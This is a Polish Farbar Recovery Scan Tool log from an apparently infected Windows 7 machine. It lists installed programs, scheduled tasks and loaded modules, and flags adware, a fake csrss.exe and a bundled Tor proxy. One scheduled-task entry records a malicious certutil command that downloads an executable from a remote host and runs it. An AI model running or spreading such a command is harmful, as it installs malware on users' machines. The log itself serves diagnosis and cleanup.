Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 16.05.2018 01 Uruchomiony przez Bartek (22-05-2018 17:09:46) Uruchomiony z C:\Users\Bartek\Desktop Windows 7 Ultimate Service Pack 1 (X64) (2016-08-25 20:31:33) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-360975752-3786565279-1083807947-500 - Administrator - Disabled) Bartek (S-1-5-21-360975752-3786565279-1083807947-1001 - Administrator - Enabled) => C:\Users\Bartek Gość (S-1-5-21-360975752-3786565279-1083807947-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-360975752-3786565279-1083807947-1002 - Limited - Enabled) ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Microsoft Security Essentials (Disabled - Out of date) {768124D7-F5F7-6D2F-DDC2-94DFA4017C95} AS: Microsoft Security Essentials (Disabled - Out of date) {CDE0C533-D3CD-62A1-E772-AFADDF863628} AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) µTorrent (HKU\S-1-5-21-360975752-3786565279-1083807947-1001\...\uTorrent) (Version: 3.5.1.44332 - BitTorrent Inc.) Aktualizacje NVIDIA 2.13.0.21 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 2.13.0.21 - NVIDIA Corporation) Hidden ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0020 - ASUS) CCleaner (HKLM\...\CCleaner) (Version: 5.21 - Piriform) ChallengeMe.GG Client version 1.5 (HKLM-x32\...\{7A91C052-5E4E-441C-A3A5-84B100B98166}_is1) (Version: 1.5 - CME.GG) CLEO 4.3 (HKLM-x32\...\{A8F37EB0-C741-41D7-8CAB-5B40ECEEF094}_is1) (Version: 4.3 - Seemann, Deji, Alien) CloudNet (HKU\S-1-5-21-360975752-3786565279-1083807947-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== UWAGA CodeBlocks (HKU\S-1-5-21-360975752-3786565279-1083807947-1001\...\CodeBlocks) (Version: 16.01 - The Code::Blocks Team) D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.4.0.0192 - Disc Soft Ltd) Fraps (remove only) (HKLM-x32\...\Fraps) (Version: - ) Gameforge Live 2.0.13 (HKLM-x32\...\{9C98989A-3A15-42DA-A3B9-D20331437D67}}_is1) (Version: 2.0.13 - Gameforge) GIMP 2.8.18 (HKLM\...\GIMP-2_is1) (Version: 2.8.18 - The GIMP Team) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 66.0.3359.181 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden GTA San Andreas (HKLM-x32\...\{D417C96A-FCC7-4590-A1BB-FAF73F5BC98E}) (Version: 1.00.00001 - Rockstar Games) Heroes of Might and Magic III (HKLM-x32\...\{8B743AA0-53B2-11D2-808A-00600895FB43}) (Version: 1.0 - ) Heroes of Might and Magic V - Dzikie Hordy (HKLM-x32\...\{ACC75323-DB4A-4f7f-9AF3-1D1DEFF2D1B5}_is1) (Version: - Ubisoft) Heroes of Might and Magic V - Tribes of the East (HKLM-x32\...\{ACC75323-DB4A-4F7F-9AF3-1D1DEFF2D1B5}) (Version: - ) HiSuite (HKLM-x32\...\Hi Suite) (Version: 1.0 - Huawei Technologies Co.,Ltd) Java 7 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217051FF}) (Version: 7.0.510 - Oracle) Malwarebytes Anti-Malware wersja 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes) Metin2 (HKLM-x32\...\Metin2_PL_is1) (Version: - Gameforge 4D GmbH) Microsoft .NET Framework 4.6.1 (PLK) (HKLM\...\{D93AC424-07D7-3992-B0C8-BDCB79173757}) (Version: 4.6.01055 - Microsoft Corporation) Microsoft .NET Framework 4.6.1 Hotfix Rollup (KB3146716) (HKLM\...\{E026AF51-E2EB-33CF-AC15-09308053FAA7}) (Version: 4.6.01078 - Microsoft Corporation) Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation) Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation) Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Mozilla Firefox 55.0.3 (x86 pl) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 pl)) (Version: 55.0.3 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0.2 - Mozilla) MTA:SA v1.5.4 (HKLM-x32\...\MTA:SA 1.5) (Version: v1.5.4 - Multi Theft Auto) Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden Need For Speed Underground 2 version 1.2.0.0 (HKLM-x32\...\Need For Speed Underground 2_is1) (Version: 1.2.0.0 - Mr DJ) NVIDIA GeForce Experience 3.0.7.34 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.0.7.34 - NVIDIA Corporation) NVIDIA Oprogramowanie systemu PhysX 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation) NVIDIA Sterownik 3D Vision 341.98 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 341.98 - NVIDIA Corporation) NVIDIA Sterownik dźwięku HD 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation) NVIDIA Sterownik graficzny 341.98 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.98 - NVIDIA Corporation) NvNodejs (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvNodejs) (Version: 3.0.7.34 - NVIDIA Corporation) Hidden NvTelemetry (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvTelemetry) (Version: 1.0.0.0 - NVIDIA Corporation) Hidden Overwolf.Setup.VC100CRTx64.Dist (HKLM\...\{EC9D5554-6852-4A55-81BB-AC02C7A8CFED}) (Version: 1.0.0 - Overwolf) Overwolf.Setup.VC100CRTx86.Dist (HKLM-x32\...\{8989DBC1-E87B-448F-9147-57EEEC5A24A5}) (Version: 1.0.0 - Overwolf) Hidden Panel sterowania NVIDIA 341.98 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 341.98 - NVIDIA Corporation) Hidden SafeFinder (HKLM-x32\...\{DAEBEC7B-840B-42CA-A61E-90AF801F52BE}) (Version: 1.0.0.0 - Linkury) <==== UWAGA SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 7.1.0320 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 3.0.7.34 - NVIDIA Corporation) Hidden SHU (HKLM-x32\...\{DF11DD92-DBB8-4F3F-9564-A8BBDBE986F5}_is1) (Version: 1.0 - ScreenShu Software) Skype™ 7.28 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.28.101 - Skype Technologies S.A.) Spotify (HKU\S-1-5-21-360975752-3786565279-1083807947-1001\...\Spotify) (Version: 1.0.63.617.g5aca9a2a - Spotify AB) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.1.8 - TeamSpeak Systems GmbH) TS Notifier (HKLM-x32\...\{D88D739F-72B4-48A7-A37D-12AD10A3B0EA}) (Version: 1.6.0004 - Andreas Gebert) Update for Skype for Business 2016 (KB3114696) 64-Bit Edition (HKLM\...\{90160000-0011-0000-1000-0000000FF1CE}_Office16.PROPLUS_{7A411660-6F59-4704-B90D-E37E20790CF2}) (Version: - Microsoft) Update for Skype for Business 2016 (KB3114696) 64-Bit Edition (HKLM\...\{90160000-00C1-0000-1000-0000000FF1CE}_Office16.PROPLUS_{7A411660-6F59-4704-B90D-E37E20790CF2}) (Version: - Microsoft) Update for Skype for Business 2016 (KB3114696) 64-Bit Edition (HKLM\...\{90160000-012B-0415-1000-0000000FF1CE}_Office16.PROPLUS_{7A411660-6F59-4704-B90D-E37E20790CF2}) (Version: - Microsoft) UsbFix (HKLM-x32\...\Usbfix) (Version: 9.001 - www.SOSVirus.Net) VBCABLE, The Virtual Audio Cable (HKLM\...\VB:VBCABLE {87459874-1236-4469}) (Version: - VB-Audio Software) Vegas Pro 11.0 (64-bit) (HKLM\...\{7DA57CC0-029B-11E2-A4C0-F04DA23A5C58}) (Version: 11.0.701 - Sony) Winamp (HKLM-x32\...\Winamp) (Version: 5.666 - Nullsoft, Inc) Windows Movie Maker 2016 (HKLM-x32\...\{3CC29C1A-B5FE-457B-8F22-32A2videowin}}_is1) (Version: - videowinsoft.com) WinRAR 5.40 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH) WinSCP 5.9.5 (HKLM-x32\...\winscp3_is1) (Version: 5.9.5 - Martin Prikryl) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-08-15] (Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal) ContextMenuHandlers1-x32-x32: [WipeFiles] -> {ED09987C-E386-4F1A-9A52-09A6B659B45F} => D:\Program Files\UndeleteMyFiles\WipeExt.dll -> Brak pliku ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => D:\Program Files\malwarebytes\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2016-09-12] (NVIDIA Corporation) ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => D:\Program Files\malwarebytes\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-08-15] (Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal) ContextMenuHandlers6-x32-x32: [WipeFiles] -> {ED09987C-E386-4F1A-9A52-09A6B659B45F} => D:\Program Files\UndeleteMyFiles\WipeExt.dll -> Brak pliku ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {03F54856-B1D0-4631-A1D7-B0E70B5EF565} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2016-09-30] (NVIDIA Corporation) Task: {1FB32D12-1B1B-4F14-85EB-8F479C5338F9} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2015-07-31] (Microsoft Corporation) Task: {2B9B6578-30B3-4BA4-A951-05FA772FA9DA} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-09-30] (NVIDIA Corporation) Task: {4600FA77-1D45-4116-975F-9B2ADD20CDB1} - System32\Tasks\MRT => C:\Users\Bartek\AppData\Local\Temp\csrss\mrt.exe [2018-05-22] () <==== UWAGA Task: {47C5BB9A-FCB4-477E-844D-18572951D8A9} - System32\Tasks\{56587220-312E-41C2-8F2C-2A86F3DA23AF} => C:\Windows\system32\pcalua.exe -a "E:\Bartek\Gry\Heroes 5\Heroes of Might & Magic V - Dzikie Hordy\Patche\heroes_might_magic_5_3.01_pl.exe" -d "E:\Bartek\Gry\Heroes 5\Heroes of Might & Magic V - Dzikie Hordy\Patche" Task: {4B98CD12-2DBA-45F9-A8AE-672F535B7F31} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-09-30] (NVIDIA Corporation) Task: {68DC3756-AA8C-4DB7-A617-E576EF866BB9} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation) Task: {6ED71622-BAE2-46F5-B7DD-0F4226095FF6} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation) Task: {9909E866-222B-43BC-8F22-5C80C74D438F} - System32\Tasks\ATKOSD2 => C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe [2012-06-25] (ASUSTek Computer Inc.) Task: {A281CE71-DA24-40E8-9FBB-DD7D5733146C} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-09-30] (NVIDIA Corporation) Task: {ABDB4510-54FD-476C-97F9-8E68A1BFB964} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-21] () <==== UWAGA Task: {BD3B26C8-4720-4D01-AB5D-CEAE6C3175F8} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: {BDF11CB4-5603-408F-B9B3-36B5804EE85F} - System32\Tasks\{D2DE5D13-9581-4CB6-A3AE-A21E739A4BCA} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Doublebam\uninstall.exe" -d "C:\Program Files (x86)\Common Files\Doublebam" Task: {C8B15871-9EBF-4859-B0D4-2D6951174F51} - System32\Tasks\vgokv => C:\Users\Bartek\AppData\Roaming\zmzol\vgokv.vbs [2018-05-21] () Task: {E84D1B0B-8656-47F4-A27C-0C0891DC1BFE} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe Task: {E85D7F66-B287-471E-8866-924BBBDCCABA} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2016-09-30] (NVIDIA Corporation) Task: {F1AA8920-6EFA-400E-B69E-BC88E72E1BF7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/3/app.exe C:\Users\Bartek\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Bartek\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA Task: {F247C00D-3C91-4876-9803-CA8880E6C4AF} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: {F6611422-8064-4DED-9E78-6A62C6FAB526} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-09-30] (NVIDIA Corporation) Task: {F82BA063-5AA1-4BC1-BFF7-960C1BED32DA} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-08-05] (Piriform Ltd) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty & WMI ======================== (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\GeForce Experience Stream Client.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=gjljknijpnfibppaijefibndmiabonep ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF% ==================== Załadowane moduły (filtrowane) ============== 2016-08-27 11:57 - 2016-09-12 22:00 - 000133568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2017-07-26 09:58 - 2017-07-26 09:58 - 000192200 _____ () C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe 2016-10-13 19:44 - 2016-09-30 06:25 - 001148984 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll 2016-10-13 19:44 - 2016-09-30 06:25 - 004490808 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll 2016-10-13 19:45 - 2016-09-30 06:25 - 000419896 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\plugins\LocalSystem\_nvspserviceplugin64.dll 2018-05-21 15:17 - 2018-05-21 15:17 - 003630080 _____ () C:\Users\Bartek\AppData\Local\Temp\csrss\proxy\Tor\tor.exe 2018-05-21 14:17 - 2018-05-21 14:17 - 001377280 ____H () C:\Windows\windefender.exe 2018-05-21 14:17 - 2018-05-21 14:17 - 003173376 _____ () C:\Windows\rss\csrss.exe 2018-05-22 14:30 - 2018-05-22 14:30 - 001484800 _____ () C:\Users\Bartek\AppData\Local\Temp\csrss\mrt.exe 2018-05-22 14:25 - 2018-05-22 16:22 - 001042432 _____ () C:\Users\Bartek\AppData\Local\Temp\wup\wup.exe 2018-01-22 12:34 - 2018-01-22 12:34 - 000174744 _____ () E:\Bartek\programy\teamspeak\quazip.dll 2017-10-13 13:17 - 2017-10-13 13:17 - 000020632 _____ () E:\Bartek\programy\teamspeak\libEGL.DLL 2017-10-13 13:17 - 2017-10-13 13:17 - 001981592 _____ () E:\Bartek\programy\teamspeak\libGLESv2.dll 2018-01-22 12:34 - 2018-01-22 12:34 - 000125592 _____ () E:\Bartek\programy\teamspeak\soundbackends\directsound_win64.dll 2018-01-22 12:34 - 2018-01-22 12:34 - 000150680 _____ () E:\Bartek\programy\teamspeak\soundbackends\windowsaudiosession_win64.dll 2018-05-16 12:31 - 2018-05-15 05:13 - 004443992 _____ () C:\Program Files (x86)\Google\Chrome\Application\66.0.3359.181\libglesv2.dll 2018-05-16 12:31 - 2018-05-15 05:13 - 000099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\66.0.3359.181\libegl.dll 2018-05-21 15:17 - 2018-05-21 15:17 - 000107520 _____ () C:\Users\Bartek\AppData\Local\Temp\csrss\proxy\Tor\zlib1.dll 2018-05-21 15:17 - 2018-05-21 15:17 - 000093095 _____ () C:\Users\Bartek\AppData\Local\Temp\csrss\proxy\Tor\libssp-0.dll 2018-05-21 15:17 - 2018-05-21 15:17 - 000717225 _____ () C:\Users\Bartek\AppData\Local\Temp\csrss\proxy\Tor\libevent-2-0-5.dll 2018-05-21 15:17 - 2018-05-21 15:17 - 000523022 _____ () C:\Users\Bartek\AppData\Local\Temp\csrss\proxy\Tor\libgcc_s_sjlj-1.dll 2016-10-13 19:44 - 2016-09-30 06:25 - 000020536 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\ProgramData:NT [40] AlternateDataStreams: C:\ProgramData:NT2 [432] AlternateDataStreams: C:\Users\All Users:NT [40] AlternateDataStreams: C:\Users\All Users:NT2 [432] AlternateDataStreams: C:\ProgramData\Application Data:NT [40] AlternateDataStreams: C:\ProgramData\Application Data:NT2 [432] AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT [40] AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT2 [432] AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40] AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [432] AlternateDataStreams: C:\ProgramData\TEMP:9482CFB4 [268] AlternateDataStreams: C:\Users\Bartek\Dane aplikacji:NT [40] AlternateDataStreams: C:\Users\Bartek\Dane aplikacji:NT2 [432] AlternateDataStreams: C:\Users\Bartek\AppData\Roaming:NT [40] AlternateDataStreams: C:\Users\Bartek\AppData\Roaming:NT2 [432] ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 04:34 - 2017-09-22 21:08 - 000000035 _____ C:\Windows\system32\Drivers\etc\hosts ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-360975752-3786565279-1083807947-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Bartek\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 8.8.8.8 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: ) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == MSCONFIG\startupreg: ATKMEDIA => C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe MSCONFIG\startupreg: ATKOSD2 => C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR MSCONFIG\startupreg: DAEMON Tools Lite Automount => "D:\daemon tools\DAEMON Tools Lite\DTAgent.exe" -autorun MSCONFIG\startupreg: HControlUser => C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControlUser.exe MSCONFIG\startupreg: ShadowPlay => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart MSCONFIG\startupreg: Spotify Web Helper => C:\Users\Bartek\AppData\Roaming\Spotify\SpotifyWebHelper.exe --autostart MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [TCP Query User{0AEC30EB-B918-4DB5-892B-0658B46AA86D}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe FirewallRules: [UDP Query User{6523B268-0560-4E69-B66C-AAE9EFB6B593}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe FirewallRules: [TCP Query User{BF99C846-3057-4B75-8BC9-2742298FE564}C:\users\bartek\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\bartek\appdata\roaming\utorrent\utorrent.exe FirewallRules: [UDP Query User{882D95DE-DE31-4FE0-981D-BA4F0E286685}C:\users\bartek\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\bartek\appdata\roaming\utorrent\utorrent.exe FirewallRules: [TCP Query User{42257498-8A58-4E72-A670-3C835324FE09}E:\bartek\programy\winamp\winamp.exe] => (Allow) E:\bartek\programy\winamp\winamp.exe FirewallRules: [UDP Query User{A8043E09-A3E3-4816-9FE8-368A9C39509F}E:\bartek\programy\winamp\winamp.exe] => (Allow) E:\bartek\programy\winamp\winamp.exe FirewallRules: [{CC24B25B-501B-428C-87E8-B682D96A1F77}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe FirewallRules: [{21118DDD-7180-42C8-AF3D-C8432A07A624}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe FirewallRules: [{13F78737-443D-4FE6-A75F-853288ADC293}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe FirewallRules: [{197C28D9-AB6E-4690-9F4C-AC60F51D4ABD}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe FirewallRules: [TCP Query User{314EF0BF-267C-4CC9-8399-7F70C486178C}C:\users\bartek\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\bartek\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{F93416D4-F3D3-4203-A8A1-087050724A0D}C:\users\bartek\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\bartek\appdata\roaming\spotify\spotify.exe FirewallRules: [{A505C5FC-C796-4932-9C8F-5A1CFC2B5B38}] => (Allow) E:\Bartek\Gry\steam\steam\Steam.exe FirewallRules: [{25802D65-D25E-431A-A6E6-4C649D36EFCA}] => (Allow) E:\Bartek\Gry\steam\steam\Steam.exe FirewallRules: [{767AEC83-DE4C-431C-948F-8DFD06A004E5}] => (Allow) E:\Bartek\Gry\steam\steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{3211E399-4738-4301-83D9-2504AB0A8FDD}] => (Allow) E:\Bartek\Gry\steam\steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: 